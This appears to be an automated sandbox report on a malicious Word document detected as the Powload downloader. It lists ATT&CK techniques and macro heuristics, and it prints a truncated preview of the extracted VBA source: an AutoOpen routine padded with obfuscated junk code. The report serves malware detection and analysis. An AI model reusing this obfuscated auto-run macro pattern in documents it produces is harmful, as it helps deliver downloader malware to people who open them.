MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon document opening. The macro utilizes GetObject and CreateObject to launch a WMI Win32_Process, indicating an attempt to execute arbitrary commands or download a secondary payload. The ClamAV detection name 'Doc.Downloader.Powload-6956244-0' further supports the downloader functionality.
Heuristics 8
-
ClamAV: Doc.Downloader.Powload-6956244-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6956244-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29309 bytes |
SHA-256: a81dff0338856208c174feb86626ae64255a88bd60741da8512e671ed00b2d2f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SADAcAAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zBQQQBA"
Attribute VB_Base = "0{9C31BECD-AC35-4988-BEE6-76D1ABE2D9C0}{E3DBEEFC-40DB-402D-BF84-8AB8D1CF46F7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Vk1xA1"
Attribute VB_Base = "0{921EC0C3-F11E-4C0F-B790-7EE22CCBC998}{A357984B-B830-490C-A686-DA4C71181229}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "MUAAC1"
Sub autoopen()
If JAQwUAB = AkcQUUG Then
ElseIf iBQDAAA = ADCBAZ Then
JAX_ABkU = CVar(807281421)
ElseIf HcAoAxx = EAAUUABU Then
YZo4QD = Hex(310567)
ElseIf NAGDAA = T_oAAw Then
AcAAkAAG = CInt(633586835)
ElseIf NDDQAo = MUAUDQ Then
End If
If rkUABB = jAkQ_XU Then
ElseIf mAZAkAQ4 = ZADwwUo Then
cADB_A1Z = CVar(31960144)
ElseIf kAkoQX4 = YBA1A4DA Then
G4U4oCDA = Hex(41225167)
ElseIf IZQkUAxZ = p1A1UA Then
t1cAkCB = CInt(313772777)
ElseIf wXAB4A = FXAQAA Then
End If
If zxAoAk = HZ4AAD Then
ElseIf oBwAUBc = mAoDACB Then
sAA4UA = CVar(900172470)
ElseIf SXBXwwAA = ZZkx1_1U Then
QQx4XA = Hex(373829164)
ElseIf scQABA = cXG_XABB Then
pQAUQwxG = CInt(814007855)
ElseIf zcBc_DAC = TD4AQx Then
End If
uUA1oG
If XABDDAC = WAk4AQAA Then
ElseIf fA_BAoA = qAGxckQ Then
QDkACDB = CVar(486341377)
ElseIf lADABAG = K4XQ1DGU Then
HZ1AAB = Hex(376816496)
ElseIf PUxQDAAA = FDACBQQ Then
rB1GDDU = CInt(14870675)
ElseIf pXXAxo4X = wkQAxAAA Then
End If
If ZQAAAA4x = WAcAAAZG Then
ElseIf BABAA1 = sUAxcCA Then
NAB1oQ = CVar(555578273)
ElseIf VQADAoA1 = wxUAAX Then
pUAAZoUw = Hex(29558707)
ElseIf GBxxBoQD = HoUXAAx Then
FkUcQxQD = CInt(290681313)
ElseIf Bo4AA4C = nwDUAA Then
End If
If SAQwGA = mDckZAx Then
ElseIf nD_kAA = DAcABD Then
OQXQAcDA = CVar(623544105)
ElseIf AB_AAA = rokAcB Then
wAAAUAD = Hex(233060568)
ElseIf hDQxAZAX = fAUkUXo Then
pwGkDA = CInt(221528681)
ElseIf XAwwAAAD = Y4cQX_cZ Then
End If
End Sub
Function fBcC_Q(EGwQXxQZ)
If QAZAA_Ax = zxAQ4w Then
ElseIf pAAkkAA = cQD1cB Then
kGDGUA = CVar(983503055)
ElseIf GCwUZU = lAxXAAw Then
oABQx_ = Hex(653498948)
ElseIf cUQDZQDA = JQADBCAU Then
p4AoZcUA = CInt(442485490)
ElseIf dX4Bk44 = rcADBG Then
End If
If O_D1BA1 = dAAwBoB Then
ElseIf pc4oAG4 = PDAD_xA Then
PAZoXA = CVar(368013455)
ElseIf tCQAGA = OQUBUGA Then
kGwAAA = Hex(955606080)
ElseIf oAAQQZZ = poAUQcAA Then
Po_UoA = CInt(119563226)
ElseIf sAABAAAA = AADCCxk Then
End If
Set fBcC_Q = CVar(EGwQXxQZ)
If YU4kAQ_ = pGAABxoX Then
ElseIf z1ABAGD1 = hUAGXA Then
PBAACA = CVar(131534684)
ElseIf EQDAkAG = WAc_AwA Then
EDB4A4 = Hex(817071654)
ElseIf MAAwAA = aDwQAA Then
KBDAAwD4 = CInt(787289538)
ElseIf p_BZDXA_ = KDAXGU Then
End If
If tQAAAA = BQUAAQX Then
ElseIf ckQwAA = LwXoAAG Then
AGUAUG = CVar(75692798)
ElseIf uAxA_Dc = VXCCA_D Then
E4GkAQA = Hex(517121053)
ElseIf MA_UAB = cBQkA_AA Then
CoAAok = CInt(989270378)
ElseIf pkw4CBA = zZADCQA Then
End If
If jAUxQA = SxGA__ Then
ElseIf NDGcA_U = LAckcU Then
GcoxUGXx = CVar(627866982)
ElseIf EDcAAAG = XAAUGBBG Then
SAAZAZ = Hex(374839455)
ElseIf j_cAAAC = jDX1AA Then
rAABkZAB = CInt(363231268)
ElseIf tGAQDk
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.